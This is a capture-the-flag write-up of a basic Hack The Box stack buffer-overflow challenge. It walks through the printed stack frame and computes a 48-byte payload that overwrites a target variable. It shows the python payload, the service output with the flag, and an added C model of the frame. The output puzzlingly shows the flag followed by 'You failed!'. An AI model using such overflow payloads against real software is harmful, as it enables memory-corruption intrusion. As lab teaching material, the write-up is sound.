Getting Started
We are asked to exploit a basic Buffer Overflow vulnerability. We are given some indications and examples as well:
$ nc 178.62.11.21 31609
Stack frame layout
| . | <- Higher addresses
| . |
|_____________|
| | <- 64 bytes
| Return addr |
|_____________|
| | <- 56 bytes
| RBP |
|_____________|
| | <- 48 bytes
| target |
|_____________|
| | <- 40 bytes
| alignment |
|_____________|
| | <- 32 bytes
| Buffer[31] |
|_____________|
| . |
| . |
|_____________|
| |
| Buffer[0] |
|_____________| <- Lower addresses
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x0000000000000000 <- Start of buffer
0x00007ffe1d81dbd8 | 0x0000000000000000
0x00007ffe1d81dbe0 | 0x0000000000000000
0x00007ffe1d81dbe8 | 0x0000000000000000
0x00007ffe1d81dbf0 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x00000000deadbeef <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
After we insert 4 "A"s (the hex representation of A is 0x41), the stack layout looks like this:
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x0000000041414141 <- Start of buffer
0x00007ffe1d81dbd8 | 0x0000000000000000
0x00007ffe1d81dbe0 | 0x0000000000000000
0x00007ffe1d81dbe8 | 0x0000000000000000
0x00007ffe1d81dbf0 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x00000000deadbeef <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
After we insert 4 "B"s (the hex representation of B is 0x42), the stack layout looks like this:
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x4242424241414141 <- Start of buffer
0x00007ffe1d81dbd8 | 0x0000000000000000
0x00007ffe1d81dbe0 | 0x0000000000000000
0x00007ffe1d81dbe8 | 0x0000000000000000
0x00007ffe1d81dbf0 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x00000000deadbeef <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉
◉ ◉
◉ Fill the 32-byte buffer, overwrite the alignment address and the "target's" 0xdeadbeef value. ◉
◉ ◉
◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉
>>
Basically, the service shows how our input data is stored on the stack and asks us to overwrite two values that sit right above the buffer: the 8-byte alignment dummy 0x6969696969696969 and the 8-byte target 0x00000000deadbeef. Counting from Buffer[0], that is 32 bytes of buffer plus 8 bytes of alignment plus 8 bytes of target, 48 bytes in total (6 * 8 since every row of the printed stack is 8 bytes). So we need to enter exactly 48 characters: fewer would stop short of the target, and more would spill into the saved RBP and the saved return address, which the challenge does not ask us to touch. For instance, A letters:
$ python3 -c 'print("A" * 48)'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x4141414141414141 <- Start of buffer
0x00007ffe1d81dbd8 | 0x4141414141414141
0x00007ffe1d81dbe0 | 0x4141414141414141
0x00007ffe1d81dbe8 | 0x4141414141414141
0x00007ffe1d81dbf0 | 0x4141414141414141 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x4141414141414141 <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
HTB{b0f_tut0r14l5_4r3_g00d}
[-] You failed!
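To check the offset arithmetic without the live service, here is an added C model of the frame the challenge prints. It is not the challenge's own source: the `struct frame` layout, the initial field values and the `vulnerable_read` copy loop are assumptions that reproduce the printed layout, since a compiler does not guarantee where locals land (which is exactly why the service prints its frame for us).

```c
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUFFER_SIZE 32

/* Assumed model of the frame the service prints, lowest address first.
 * Every field is 8-byte aligned, so the struct has no padding and the
 * offsets match the printed addresses (0x...dbd0 + offset). */
struct frame {
    unsigned char buffer[BUFFER_SIZE]; /* +0x00  Buffer[0..31]              */
    uint64_t alignment;                /* +0x20  0x6969696969696969 dummy   */
    uint64_t target;                   /* +0x28  0x00000000deadbeef target  */
    uint64_t saved_rbp;                /* +0x30  saved rbp                  */
    uint64_t saved_ret;                /* +0x38  saved return address       */
};

/* Values the challenge shows before any input is entered. */
static void frame_init(struct frame *f) {
    memset(f->buffer, 0, sizeof f->buffer);
    f->alignment = 0x6969696969696969ULL;
    f->target    = 0x00000000deadbeefULL;
    f->saved_rbp = 0x000055a7c5e33800ULL;
    f->saved_ret = 0x00007f339c259c87ULL;
}

/* The bug being modelled: input is copied into buffer using the sender's
 * length rather than BUFFER_SIZE, so bytes 32 and beyond land on the
 * fields above the buffer. The only bound is the end of the model frame,
 * added so the model itself stays memory-safe. */
static void vulnerable_read(struct frame *f, const unsigned char *input, size_t len) {
    unsigned char *base = (unsigned char *)f + offsetof(struct frame, buffer);
    size_t room = sizeof *f - offsetof(struct frame, buffer);
    for (size_t i = 0; i < len && i < room; i++)
        base[i] = input[i];
}

/* Bytes needed from Buffer[0] to the last byte of target:
 * 32 (buffer) + 8 (alignment) + 8 (target) = 48. */
static size_t bytes_to_cover_target(void) {
    return offsetof(struct frame, target) + sizeof(uint64_t)
         - offsetof(struct frame, buffer);
}

/* Feed n bytes of 'A' into a fresh frame. Returns 1 when alignment and
 * target were both overwritten while saved rbp and the return address
 * kept their values, which is the outcome the challenge wants; the
 * resulting frame is copied to *out when out is non-NULL. */
static int check_payload(size_t n, struct frame *out) {
    unsigned char payload[128];
    struct frame f;

    if (n > sizeof payload)
        n = sizeof payload;
    memset(payload, 'A', sizeof payload);

    frame_init(&f);
    vulnerable_read(&f, payload, n);
    if (out)
        *out = f;

    return f.alignment != 0x6969696969696969ULL
        && f.target    != 0x00000000deadbeefULL
        && f.saved_rbp == 0x000055a7c5e33800ULL
        && f.saved_ret == 0x00007f339c259c87ULL;
}

int main(void) {
    struct frame f;
    int ok = check_payload(bytes_to_cover_target(), &f);

    printf("alignment 0x%016" PRIx64 "\n", f.alignment);
    printf("target    0x%016" PRIx64 "\n", f.target);
    printf("saved rbp 0x%016" PRIx64 "\n", f.saved_rbp);
    printf("saved ret 0x%016" PRIx64 "\n", f.saved_ret);
    printf("%s\n", ok ? "target overwritten, frame above it intact"
                      : "payload length wrong");
    return ok ? 0 : 1;
}
```

Running it feeds 48 A bytes through the model: alignment and target come out as 0x4141414141414141 while the saved RBP and return address keep their values, matching the table the service printed. Changing the count in `check_payload` shows the two failure modes: 40 bytes stop at the alignment dummy and leave 0xdeadbeef in place, and 56 bytes also clobber the saved RBP.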